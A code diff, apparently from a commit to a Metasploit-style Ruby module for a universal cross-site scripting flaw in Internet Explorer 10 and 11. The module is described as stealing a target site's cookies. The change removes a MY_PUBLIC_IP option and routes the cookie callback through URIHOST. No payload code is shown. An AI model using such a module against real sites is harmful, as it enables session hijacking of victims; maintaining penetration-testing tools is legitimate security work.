@@ -15,9 +15,7 @@ def initialize(info={})
15
15
'Description' => %q{
16
16
This module exploits a universal cross-site scripting (UXSS) vulnerability found in Internet
17
17
Explorer 10 and 11. It will steal the cookie of a specific webiste (set by the TARGET_URI
18
- datastore option). You will also most likely need to configure the MY_PUBLIC_IP
19
- datastore option in order receive the cookie. If you and the victim are actually in the
20
- same internal network, then you don't need to touch MY_PUBLIC_IP.
18
+ datastore option). You will also most likely need to configure the URIHOST if you are behind NAT.
21
19
} ,
22
20
'License' => MSF_LICENSE ,
23
21
'Author' =>
@@ -38,8 +36,7 @@ def initialize(info={})
38
36
39
37
register_options (
40
38
[
41
- OptString . new ( 'TARGET_URI' , [ true , 'The URL for the target iframe' ] ) ,
42
- OptString . new ( 'MY_PUBLIC_IP' , [ false , 'The exploit\'s public facing IP (Default: Internal IP)' ] ) ,
39
+ OptString . new ( 'TARGET_URI' , [ true , 'The URL for the target iframe' ] )
43
40
] , self . class )
44
41
end
45
42
@@ -64,12 +61,10 @@ def ninja_cookie_stealer_name
64
61
end
65
62
66
63
def get_uri ( cli = self . cli )
67
- ssl = !! ( datastore [ "SSL" ] )
64
+ ssl = datastore [ "SSL" ]
68
65
proto = ( ssl ? "https://" : "http://" )
69
66
if datastore [ 'URIHOST' ]
70
67
host = datastore [ 'URIHOST' ]
71
- elsif datastore [ 'MY_PUBLIC_IP' ]
72
- host = datastore [ 'MY_PUBLIC_IP' ]
73
68
elsif ( cli and cli . peerhost )
74
69
host = Rex ::Socket . source_address ( cli . peerhost )
75
70
else
0 commit comments